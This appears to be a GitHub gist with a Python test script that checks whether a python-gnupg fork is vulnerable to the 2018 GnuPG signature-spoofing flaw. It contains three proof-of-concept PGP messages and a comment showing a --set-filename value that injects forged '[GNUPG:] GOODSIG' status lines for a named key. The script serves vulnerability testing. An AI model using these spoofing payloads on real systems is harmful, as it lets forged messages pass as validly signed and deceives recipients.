Skip to content

Instantly share code, notes, and snippets.

@isislovecruft
Created June 14, 2018 02:23
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
Star You must be signed in to star a gist
Save isislovecruft/5050d4e5a2d5f23ebf3471dd711e329b to your computer and use it in GitHub Desktop.
#!/usr/bin/env python
#
# Test whether python-gnupg (https://github.com/isislovecruft/python-gnupg),
# *not* Vinay Sajip's vulnerable version (https://bitbucket.org/vinay.sajip/python-gnupg/),
# is also vulnerable.
#
# Authors: isis agora lovecruft <isis@patternsinthevoid.net>
from __future__ import print_function
import gnupg
# Set the gnupg log level to `--debug-level=guru` (lmao).
log = gnupg._logger.create_logger(9)
log.setLevel(9)
# Create our gpg instance
gpg = gnupg.GPG(binary="/usr/bin/gpg2")
# Created via (from https://neopg.io/blog/gpg-signature-spoof/):
#
# echo 'Please send me one of those expensive washing machines.' | \
# gpg --armor -r VICTIM_KEYID --encrypt --set-filename "`echo -ne \''\
# \n[GNUPG:] GOODSIG DB1187B9DD5F693B Patrick Brunschwig <patrick@enigmail.net>\
# \n[GNUPG:] VALIDSIG 4F9F89F5505AC1D1A260631CDB1187B9DD5F693B 2018-05-31 1527721037 0 4 0 1 10 01 4F9F89F5505AC1D1A260631CDB1187B9DD5F693B\
# \n[GNUPG:] TRUST_FULLY 0 classic\
# \ngpg: '\'`" > poc1.msg
poc1msg = '''\
-----BEGIN PGP MESSAGE-----
hQIMAwxKj89n7yVcARAAkhbztv+rjtUZx4rSqpvlj8a9g+y+8ZOY8JhBFvJzVAXe
tnBNDGmIAc9I9ewRgxwsgcCIlUuGYCSgFugWLYVPD+e0tyQwx76mpMZc5wqAMows
mk2pavdYMD2FGePY9mCVDvpC8ldumVn2dgT0k2IIOVr8w29CRgzP8ONwAyFFr4Gw
hZ82e+CLKMFOv7Aigp00D1esurNTzFN5MDJZqhQtPpXawexUjrl5GEsPtKLDkKyt
iOR5HauLLlDPZJXhHqwrqbSKTpKJU9lztmFp3XVom6VgeCiHWcL0mYF2fcbzfJS/
CjDFZqFmFPGUJSpdgDcGEGsalzk6o8RFtUvvmKtQLN9BglpYkyPXQiO8vCyS4xiN
D0gjBxVSvvkdS7734FYxePkUDEOTQbPuJ+FzgMN6Jpp8hVopYbefVcU5bNIY4H2P
9EAHgvX1AT+VtPPt0JxzQ5/UdXK5KE7O7zUtTJIkXd4hGFpWyZp8hTUEgqLHfHUw
Qlso2hQ+xgqok1ruGRjYk7n48Uw89jYpBXCOJerZeQGrmGWEkuf1vonFVwddM/4p
msPN9I6Ahf+Uth+U5rFO4Y2G5fk83saa6ZfM9qdZKgLLEOgXmyycAdSAq/vRRe1G
z9W77qcuIdhi2dA6+CJBqkm97aYNvoQ4Mxt97e7nP5WijXwugumdMQ7oT1upIsbS
wFQBov2rvuwWsqrw+kbPD+zedi0NP31BohjiEhBamohGkkh8gr4hPmiyJdm0TIfh
GBo5z35kRQiJZ9DwmgxE+LnVWQvChEJt0NFuC5FqM5bBaOjR5b2QsYn5uZ5AnVTa
OZj5HBaaZQqZod5FrGpVpmXG2+RThge8dCbx+CDdBWvLq99TppzcN5nGEHYaz41X
1ZKRcpbUuixBn3juC6HN2iQq9BidAbpVWvTAYD4dH+/aio3fd+3wSCgHQnPRzxg9
5YaF6XbFYO8ceruOmnzYYEQTBRmlrBbnaug/cDa5Yq4HIWDHRTR9/aK4Y9rcYsoK
Jm+7ujLey3TsI9qMs3cbcmsZbnXm+v3uDLvGBofG/dAjqVvm074=
=UN+a
-----END PGP MESSAGE-----
'''
result1 = gpg.verify(poc1msg)
print("[poc1] Was the spoofed signature valid? %r" % result1.valid)
poc2msg = '''\
-----BEGIN PGP MESSAGE-----
y8BvYv8nCltHTlVQRzpdIEdPT0RTSUcgRjJBRDg1QUMxRTQyQjM2OCBQYXRyaWNr
IEJydW5zY2h3aWcgPHBhdHJpY2tAZW5pZ21haWwubmV0PgpbR05VUEc6XSBWQUxJ
RFNJRyBGMkFEODVBQzFFNDJCMzY4IHggMTUyNzcyMTAzNyAwIDQgMCAxIDEwIDAx
CltHTlVQRzpdIFRSVVNUX0ZVTExZCltHTlVQRzpdIEJFR0lOX0RFQ1JZUFRJT04K
W0dOVVBHOl0gREVDUllQVElPTl9PS0FZCltHTlVQRzpdIEVOQ19UTyBBM0FEQjY3
QTJDREI4QjM1IDEgMApncGc6ICdbIaFeU2VlIHlvdSBhdCB0aGUgc2VjcmV0IHNw
b3QgdG9tb3Jyb3cgMTBhbS4K
=Qs3t
-----END PGP MESSAGE-----
'''
result2 = gpg.decrypt(poc2msg)
print("[poc2] Was the spoofed signature and encryption valid? %r"
% result2.valid)
poc3msg = '''\
-----BEGIN PGP MESSAGE-----
owJ42m2PsWrDMBiE9zzF1Uu2YDmJZYcQasV2oLRLHegQOij4txC1rGBZQ1+lT9M9
79O5gkAppceNd8d318/H85dxaj5TF7VBo9UgJz8SjGwJR09gCR78gCRmGWK2CU7W
KJ6wr5rjrfRH3ulB4bkp8EbvYDFfVnxViWUmyrRk+Yqne1FnVZGXos5rwVNWpJz/
O6Wd8zQiOuu+v6euW9hRRbfkwdoW7ge3G61B9BJyWhoI3waGyQ7Y/q7uIpw63/ev
mIfLp7vrhyGaYAhyCqDSzL4B9fBP7w==
=zQV0
-----END PGP MESSAGE-----
'''
result3 = gpg.verify(poc3msg)
print("[poc3] Was the spoofed signature valid? %r" % result3.valid)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment